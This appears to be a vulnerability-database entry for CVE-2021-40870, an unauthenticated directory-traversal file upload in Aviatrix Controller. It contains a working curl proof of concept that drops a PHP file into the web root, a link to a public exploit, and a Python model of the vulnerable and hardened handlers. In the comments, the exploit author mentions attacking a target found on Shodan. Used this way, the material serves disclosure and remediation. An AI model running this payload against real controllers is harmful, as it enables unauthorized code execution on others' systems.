Moderate
CVE-2021-40870
Description
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
Ratings
- Attacker Value: Medium
- Exploitability: Very High
Technical Analysis
Description
This vulnerability allows an attacker to create and store a file on the Aviatrix controller. The exploitation phase doesn't need any user authentication, nor does it require any other user interaction; it can simply be exploited using curl. Here is one example.

curl -k https://aviatrix.domain.tld/v1/backend1 \
  -d CID=x \
  -d action=set_metric_gw_selections \
  -d account_name=/../../../var/www/php/poc.php \
  -d 'data=hello<?php echo "Vulnerable Poc";?>'
# CID=x is a dummy session id; the endpoint does not check it.
# account_name is spliced into a filesystem path, so the ../ sequence walks into the web root and data= is written as the file body.
# After executing the previous command, if the target is vulnerable this will create a PHP file at this path: https://vulnerable.target.com/v1/poc

An attacker can do this unauthenticated because many API calls do not enforce a check for authentication. This allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem.
Or you can use this exploit to perform the exploitation more easily: https://github.com/JoyGhoshs/CVE-2021-40870
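The write primitive described in the assessment above, modelled as an added example (this is not Aviatrix code and not the assessment author's exploit). The storage directory, handler names and session set are assumptions; only the request parameters (CID, action, account_name, data) come from the PoC request. The vulnerable handler splices account_name into a path with no session check, so the PoC payload lands in var/www/php under the scratch root; the hardened handler requires a known session, allowlists the account name, chooses the file extension itself and confirms the resolved path stays inside its base directory.

```python
import os
import re
import tempfile

# Hypothetical on-disk location for per-account metric selections; the real
# controller layout is not documented on this page.
METRICS_DIR = "opt/metrics/selections"
# Allowlist for account names: no slashes, no dots, bounded length.
ACCOUNT_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")

# Parameters of the PoC request from the write-up (CID=x is a dummy session id).
POC_PARAMS = {
    "CID": "x",
    "action": "set_metric_gw_selections",
    "account_name": "/../../../var/www/php/poc.php",
    "data": 'hello<?php echo "Vulnerable Poc";?>',
}


def vulnerable_set_metric_gw_selections(root: str, params: dict) -> str:
    """Models the flawed handler: no session check and account_name spliced
    straight into a filesystem path.  Returns the path that was written."""
    # String concatenation: the leading '/' does not reset the path, and the
    # three '..' components walk out of METRICS_DIR to the root.
    path = os.path.normpath(f"{root}/{METRICS_DIR}/{params['account_name']}")
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(params["data"])
    return path


def hardened_set_metric_gw_selections(root: str, params: dict, sessions: set) -> str:
    """Same operation with three checks: a valid session, an allowlisted
    account name, and a containment check on the fully resolved path."""
    if params.get("CID") not in sessions:
        raise PermissionError("unauthenticated request")
    name = params.get("account_name", "")
    if not ACCOUNT_NAME_RE.fullmatch(name):
        raise ValueError(f"rejected account_name {name!r}")
    base = os.path.realpath(os.path.join(root, METRICS_DIR))
    # The server picks the extension; the client never controls it.
    path = os.path.realpath(os.path.join(base, name + ".json"))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("resolved path escapes the metrics directory")
    os.makedirs(base, exist_ok=True)
    with open(path, "w") as fh:
        fh.write(params["data"])
    return path


def demo(root=None) -> dict:
    """Runs the PoC parameters through both handlers under a scratch root and
    returns what each one did, as paths relative to that root."""
    root = os.path.realpath(root or tempfile.mkdtemp(prefix="cve-2021-40870-"))
    os.makedirs(os.path.join(root, METRICS_DIR), exist_ok=True)
    dropped = vulnerable_set_metric_gw_selections(root, POC_PARAMS)
    with open(dropped) as fh:
        body = fh.read()
    outcomes = {
        "vulnerable_wrote": os.path.relpath(dropped, root),
        "vulnerable_content": body,
    }
    cases = (
        ("hardened_no_session", POC_PARAMS, set()),
        ("hardened_traversal", POC_PARAMS, {"x"}),
        ("hardened_legit", {**POC_PARAMS, "account_name": "acct-1"}, {"x"}),
    )
    for label, params, sessions in cases:
        try:
            written = hardened_set_metric_gw_selections(root, params, sessions)
            outcomes[label] = os.path.relpath(written, root)
        except (PermissionError, ValueError) as exc:
            outcomes[label] = f"{type(exc).__name__}: {exc}"
    return outcomes


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The allowlist alone is enough to stop the PoC payload; the commonpath check is there for the case where a later change relaxes the pattern, and the session check addresses the separate finding that the endpoint accepted an arbitrary CID.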
General Information
Vendors
- aviatrix
Products
- controller
Exploited in the Wild
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- News Article or Blog (https://unit42.paloaltonetworks.com/network-attacks-trends-august-october-2021/)
Hey @JoyGhoshs, great write-up, thanks! I was trying to find some kind of confirmation somewhere that this is exploited in the wild, though, and I’m not coming up with anything—have you observed active attacks by adversaries (not pen testers) against this somewhere, or were you reporting it as “Exploited in the wild” simply because details are available?
Hey @ccondon-r7, yes, I have performed an active attack against a vulnerable target which I found on Shodan by doing a little search.
Thanks @JoyGhoshs. Assuming you were attacking a target that you had permission to attack, we would not consider that to be exploitation in the wild. (If you were attacking a target that you did not have permission to attack…well, we aren’t lawyers, but that’s a pretty bad idea and probably not legal!)
To be considered “in the wild,” exploitation generally needs to take place outside lab environments and not within pen testing engagements. In other words, we only mark things “exploited in the wild” when threat actors are exploiting vulnerable targets to achieve some type of objective.